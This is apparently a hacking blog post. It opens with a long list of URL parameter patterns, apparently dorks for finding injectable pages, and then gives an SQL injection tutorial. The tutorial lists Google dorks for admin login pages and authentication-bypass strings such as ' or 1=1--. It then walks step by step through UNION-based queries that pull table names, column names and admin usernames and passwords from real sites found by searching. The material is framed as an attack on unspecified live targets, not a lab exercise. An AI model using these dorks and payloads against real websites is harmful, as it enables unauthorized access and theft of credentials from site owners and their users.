summary.php?PID=

news/latest_news.php?cat_id=

index.php?cPath=

category.php?CID=

index.php?pid=

more_details.php?id=

specials.php?osCsid=

search/display.php?BookID=

articles.php?id=

print.php?sid=

page.php?id=

more_details.php?id=

newsite/pdf_show.php?id=

shop/category.php?cat_id=

shopcafe-shop-product.php?bookId=

shop/books_detail.php?bookID=

index.php?cPath=

more_details.php?id=

news.php?id=

more_details.php?id=

shop/books_detail.php?bookID=

more_details.php?id=

blog.php?blog=

index.php?pid=

prodotti.php?id_cat=

category.php?CID=

more_details.php?id=

poem_list.php?bookID=

more_details.php?id=

content.php?categoryId=

authorDetails.php?bookID=

press_release.php?id=

item_list.php?cat_id=

colourpointeducational/more_details.php?id=

index.php?pid=

download.php?id=

shop/category.php?cat_id=

i-know/content.php?page=

store/index.php?cat_id=

yacht_search/yacht_view.php?pid=

pharmaxim/category.php?cid=

print.php?sid=

specials.php?osCsid=

store.php?cat_id=

category.php?cid=

displayrange.php?rangeid=

product.php?id=

csc/news-details.php?cat=

products-display-details.php?prodid=

stockists_list.php?area_id=

news/newsitem.php?newsID=

index.php?pid=

newsitem.php?newsid=

category.php?id=

news/newsitem.php?newsID=

details.php?prodId=

publications/publication.php?id=

purelydiamond/products/category.php?cat=

category.php?cid=

product/detail.php?id=

news/newsitem.php?newsID=

details.php?prodID=

item.php?item_id=

edition.php?area_id=

page.php?area_id=

view_newsletter.php?id=

library.php?cat=

categories.php?cat=

page.php?area_id=

categories.php?cat=

publications.php?id=

item.php?sub_id=

page.php?area_id=

page.php?area_id=

category.php?catid=

content.php?cID=

newsitem.php?newsid=

frontend/category.php?id_category=

news/newsitem.php?newsID=

things-to-do/detail.php?id=

page.php?area_id=

page.php?area_id=

listing.php?cat=

item.php?iid=

customer/home.php?cat=

staff/publications.php?sn=

news/newsitem.php?newsID=

library.php?cat=

main/index.php?uid=

library.php?cat=

shop/eventshop/product_detail.php?itemid=

news/newsitem.php?newsID=

news/newsitem.php?newsID=

library.php?cat=

FullStory.php?Id=

publications.php?ID=

publications/book_reviews/full_review.php?id=

newsitem.php?newsID=

newsItem.php?newsId=

site/en/list_service.php?cat=

page.php?area_id=

product.php?ProductID=

releases_headlines_details.php?id=

product.php?shopprodid=

product.php?productid=

product.php?product=

product.php?product_id=

productlist.php?id=

product.php?shopprodid=

garden_equipment/pest-weed-control/product.php?pr=

product.php?shopprodid=

browsepr.php?pr=

productlist.php?id=

kshop/product.php?productid=

product.php?pid=

showproduct.php?prodid=

product.php?productid=

productlist.php?id=

index.php?pageId=

productlist.php?tid=

product-list.php?id=

onlinesales/product.php?product_id=

garden_equipment/Fruit-Cage/product.php?pr=

product.php?shopprodid=

product_info.php?products_id=

productlist.php?tid=

showsub.php?id=

productlist.php?fid=

products.php?cat=

products.php?cat=

product-list.php?id=

product.php?sku=

store/product.php?productid=

products.php?cat=

productList.php?cat=

product_detail.php?product_id=

product.php?pid=

wiki/pmwiki.php?page****=

summary.php?PID=

productlist.php?grpid=

cart/product.php?productid=

db/CART/product_details.php?product_id=

ProductList.php?id=

products/product.php?id=

product.php?shopprodid=

product_info.php?products_id=

product_ranges_view.php?ID=

cei/cedb/projdetail.php?projID=

products.php?DepartmentID=

product.php?shopprodid=

product.php?shopprodid=

product_info.php?products_id=

index.php?news=

education/content.php?page=

Interior/productlist.php?id=

products.php?categoryID=

modules.php?****=

message/comment_threads.php?postID=

artist_art.php?id=

products.php?cat=

index.php?option=

ov_tv.php?item=

index.php?lang=

showproduct.php?cat=

index.php?lang=

product.php?bid=

product.php?bid=

cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=

item_show.php?lid=

?pagerequested=

downloads.php?id=

print.php?sid=

print.php?sid=

product.php?intProductID=

productList.php?id=

product.php?intProductID=

more_details.php?id=

more_details.php?id=

books.php?id=

index.php?offs=

mboard/replies.php?parent_id=

Computer Science.php?id=

news.php?id=

pdf_post.php?ID=

reviews.php?id=

art.php?id=

prod.php?cat=

event_info.php?p=

view_items.php?id=

home.php?cat=

item_book.php?CAT=

www/index.php?page=

schule/termine.php?view=

goods_detail.php?data=

storemanager/contents/item.php?page_code=

view_items.php?id=

customer/board.htm?mode=

help/com_view.html?code=

n_replyboard.php?typeboard=

eng_board/view.php?T****=

prev_results.php?prodID=

bbs/view.php?no=

gnu/?doc=

zb/view.php?uid=

global/product/product.php?gubun=

m_view.php?ps_db=

naboard/memo.php?bd=

bookmark/mybook/bookmark.php?bookPageNo=

board/board.html?table=

kboard/kboard.php?board=

order.asp?lotid=

english/board/view****.php?code=

goboard/front/board_view.php?code=

bbs/bbsView.php?id=

boardView.php?bbs=

eng/rgboard/view.php?&bbs_id=

product/product.php?cate=

content.php?p=

page.php?module=

?pid=

bookpage.php?id=

view_items.php?id=

index.php?pagina=

product.php?prodid=

notify/notify_form.php?topic_id=

php/index.php?id=

content.php?cid=

product.php?product_id=

constructies/product.php?id=

detail.php?id=

php/index.php?id=

index.php?section=

product.php?****=

show_bug.cgi?id=

detail.php?id=

bookpage.php?id=

product.php?id=

today.php?eventid=

main.php?item=

index.php?cPath=

news.php?id=

event.php?id=

print.php?sid=

news/news.php?id=

module/range/dutch_windmill_collection.php?rangeId=

print.php?sid=

show_bug.cgi?id=

product_details.php?product_id=

products.php?groupid=

projdetails.php?id=

product.php?productid=

products.php?catid=

product.php?product_id=

product.php?prodid=

product.php?prodid=

newsitem.php?newsID=

newsitem.php?newsid=

profile.php?id=

********s_in_area.php?area_id=

productlist.php?id=

productsview.php?proid=

rss.php?cat=

pub/pds/pds_view.php?start=

products.php?rub=

ogloszenia/rss.php?cat=

print.php?sid=

product.php?id=

print.php?sid=

magazin.php?cid=

galerie.php?cid=

www/index.php?page=

view.php?id=

content.php?id=

board/read.php?tid=

product.php?id_h=

news.php?id=

index.php?book=

products.php?act=

reply.php?id=

stat.php?id=

products.php?cat_id=

free_board/board_view.html?page=

item.php?id=

view_items.php?id=

main.php?prodID=

gb/comment.php?gb_id=

gb/comment.php?gb_id=

classifieds/showproduct.php?product=

view.php?pageNum_rscomp=

cart/addToCart.php?cid=

content/pages/index.php?id_cat=

content.php?id=

display.php?ID=

display.php?ID=

ponuky/item_show.php?ID=

default.php?cPath=

main/magpreview.php?id=

***zine/board.php?board=

content.php?arti_id=

mall/more.php?ProdID=

product.php?cat=

news.php?id=

content/view.php?id=

content.php?id=

index.php?action=

board_view.php?s_board_id=

NOTE: you can even offer me work for training you ethical hacking on  shubhamchoudharyhacker.com

Sql Injection

Hello guys this is my first blog and I am very much excited and even not much confident about what to share with you people .
But since I had some decent knowledge in the the field of Hacking So lets start with some of the very basic Website
Hacking Tricks. ;)
Let see one of the very popular topic Sql Injection.

So,what is an sql injection?
A injecting sql queries into another database or using queries to get auth bypass as an admin is called
sql injection.
 i will show it in 2 parts

part 1 : Basic sql injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "sql injection"
and for our password also we type our sql injection

here is a list of sql injections

1'or'1'='1
'x or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


there are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.

So your input should look like this

username:1'or'1'='1
password:1'or'1'='1

So click submit and you'r in

NOTE not all sites are vulnerable.


part 2: injecting sql queries to extract the admin username and password
                also called manual sql injection


ok so lets say we have a site :

 http://www.site.com/departmentindex.php?id=-48'

Functions used:
database() || for finding the database name
version()  || for finding the version of the db
user()     || for finding the root user of the db
group_concat() || for make the collection of the different things

Step:1 find the parameter value || somthing=somthing
       EX:
 http://www.site.com/departmentindex.php?id=-48'          select * from products where id=48;
         http://www.site.com/departmentindex.php?id=-48' is just an  example

Step:2 apply single quote '
       EX:
 http://www.site.com/departmentindex.php?id=-48'

Step:3 find number of columns
      id=15 order by 1-- || for union base sqli
      id=15'order by 1-- - || for string base sqli
   
 http://www.site.com/departmentindex.php?id=-48'order by 16-- -

Step:4 now find vul column
         
 
 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

Step:5 Now find the tables

 
 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15 from information_schema.table_constraints-- -

Step:6 Now finding the columns


 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15 from information_schema.columns where table_name='useraccounts'-- -

Step:7fetching Data

 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(uname,upassword),8,9,10,11,12,13,14,15 from table_name='useraccounts'-- -

and you will get an admin account login password.

you can also do this by automated tool may be i can show it to you in my future post

happy hacking ;p

NOTE: you can even offer me work for training you ethical hacking on  shubhamchoudharyhacker.com